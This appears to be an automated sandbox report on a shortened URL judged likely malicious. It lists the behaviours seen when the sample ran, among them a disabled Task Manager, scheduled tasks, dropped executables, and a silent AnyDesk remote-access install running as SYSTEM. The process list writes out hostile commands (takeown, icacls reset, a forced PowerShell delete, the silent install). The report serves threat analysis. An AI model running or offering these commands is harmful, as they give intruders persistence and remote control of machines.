Analysis Overview
Threat Level: Likely malicious
The submitted URL https://t.co/qAuDl4bh13 was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Loads dropped DLL
Checks computer location settings
Modifies file permissions
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Enumerates physical storage devices
Creates scheduled task(s)
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Modifies registry key
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-05 18:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 18:12
Reported
2024-06-05 18:17
Platform
win10v2004-20240226-en
Max time kernel
263s
Max time network
269s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
Note: every path below sits under C:\Windows\SysWOW64\config\systemprofile, which is the LocalSystem account's profile as seen by a 32-bit process through WOW64 redirection. Writes there mean C:\ProgramData\Anydesk.exe was already running as SYSTEM (the AnyDesk service set up by the --install run listed under Processes), not as the Admin user; the files themselves are AnyDesk's own user.conf and ad.trace plus Explorer icon-cache databases.
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
Note: every row below comes from msedge.exe, the browser the sandbox used to open the submitted URL, not from any dropped file; this signature adds nothing to the verdict here.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{31CD515F-C7B0-443D-80F5-BFE4F635729C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{FA0D303D-4D21-4141-9163-41011D528D26} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.co/qAuDl4bh13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5356 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5740 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5872 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4272 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6000 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5600 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=5632 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4828 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5720 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=4212 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5884 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=5960 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=6280 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6156 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=6232 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6816 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6916 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6860 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x234,0x238,0x7ffe57e72e98,0x7ffe57e72ea4,0x7ffe57e72eb0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2724 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2832 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2944 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4404 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4404 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\Desktop\Goonscript.exe
"C:\Users\Admin\Desktop\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F75B.tmp\F75C.tmp\F75D.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2D5.tmp\2D6.tmp\2D7.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4728 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
